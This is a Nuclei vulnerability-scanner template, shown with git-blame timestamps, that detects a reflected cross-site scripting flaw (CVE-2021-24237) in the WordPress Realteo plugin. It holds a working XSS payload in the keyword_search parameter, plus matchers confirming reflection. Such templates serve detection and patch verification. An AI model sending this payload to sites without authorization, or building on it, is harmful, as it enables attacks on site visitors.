nuclei-templates/http/cves/2021/CVE-2021-24237.yaml

51 lines
1.7 KiB
YAML
Raw Normal View History

2021-06-09 11:11:17 +00:00
id: CVE-2021-24237
info:
name: WordPress Realteo <=1.2.3 - Cross-Site Scripting
author: 0x_Akoko
2021-06-09 11:11:17 +00:00
severity: medium
description: WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page.
reference:
- https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
- https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
- https://nvd.nist.gov/vuln/detail/CVE-2021-24237
- https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Findeo-WordPress-Theme-v1.3.0.txt
2023-07-11 19:49:27 +00:00
- https://www.docs.purethemes.net/findeo/knowledge-base/changelog-findeo/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24237
cwe-id: CWE-79
epss-score: 0.00284
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:purethemes:findeo:*:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.64615
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
framework: wordpress
vendor: purethemes
product: findeo
tags: cve,cve2021,realteo,xss,wordpress,plugin,wpscan,intrusive
2021-06-09 11:11:17 +00:00
http:
2021-06-09 11:11:17 +00:00
- method: GET
path:
2023-07-11 19:49:27 +00:00
- "{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F"
2021-06-09 11:11:17 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2023-07-11 19:49:27 +00:00
words:
- autofocus onfocus=alert(/{{randstr}}/);//
- Nothing found
2021-06-09 11:11:17 +00:00
condition: and
- type: word
part: header
2023-07-11 19:49:27 +00:00
words:
- text/html
- type: status
status:
- 200